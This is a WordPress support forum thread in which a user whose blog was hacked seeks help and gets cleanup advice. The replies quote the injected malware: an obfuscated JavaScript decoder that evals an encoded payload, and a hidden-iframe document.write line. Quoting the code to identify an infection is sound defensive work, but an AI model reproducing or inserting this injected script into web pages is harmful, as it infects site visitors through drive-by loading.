Support » Fixing WordPress » I think my blog has been hacked!!

  • Hi all,

    I think my website has been hacked. I cannot load it anymore and Nortong blocks it with ‘HTTP Malicious Toolkit Variant Activity’.

    Anybody any idea what might be going on?

    Thanks for any help with this.


    The blog is:

Viewing 7 replies - 1 through 7 (of 7 total)
  • Moderator kmessinger


    Yes, you have been hacked. When I first brought up your site my virus program blocked 4 viruses. In any case your site is home for many trojans. Hopefully your database is ok.

    any idea what I can do about this?

    1) Take your site offline to prevent spreading the evil.
    2) Get your host to help you clean it up.
    3) Figure out how this happened. Your host should be able to help you!

    I found this bit of code sprinkled through all my wordpress files and index pages…

    function db3b23(x) {var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,61,14,3,1,44,42,15,39,45,0,0,0,0,0,0,47,30,62,59,13,41,34,6,23,54,57,22,29,56,55,31,16,24,11,12,0,26,27,21,52,53,18,0,0,0,0,28,0,36,4,20,8,7,17,32,33,40,37,35,51,9,38,58,50,43,48,49,5,2,46,25,10,60,19);for(g=Math.ceil(y/c);g>0;g–){q=”;for(z=Math.min(y,c);z>0;z–,y–){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(148^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}db3b23(‘kN@Br@0MoA2MY3AM88o5P@@Bs7Cqr@01h8Oyo3vvkVA0ge7@lFU0pVA1Je79oHOBs8xy9x7qN3x98VB1EUR0g32JvvCv5K7yrN7M1@@Bov@Jl@RMCvo50nL1gl@vn@OMo37@wH7MyqqJYq7yC87@1oRigpxE1BC5rN6y5A7ilBC5IZCM137My8UEjUx9yeO0ll7MEuxEXA2M9kOyEURy1O2JMHOCv60Boe@96Fov1R@JY8Oy62V@’) </script><!– –>

    Anyone recognise it?




    no, and i wouldnt see the point if I did, honestly. im not sure why theres a comment with your domain name in it though.

    Ive not googled that code, but are you positive thats not something that you actually added, or is the comment at the end the start of something else?

    edit, nm i googled it




    google is truly amazing, btw. its this really nifty, new search engine thing, where you can like, you know, put stuff into this box, and click one key, and you get all kind of answers back.

    document.write('<iframe name=6d40ec src="'+Math.round(Math.random()*16682)+'6d40ec'+'" width=439 height=38 style="display:none"></iframe>')

    @jonnyd: Haven’t seen this before, but maybe this will help.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘I think my blog has been hacked!!’ is closed to new replies.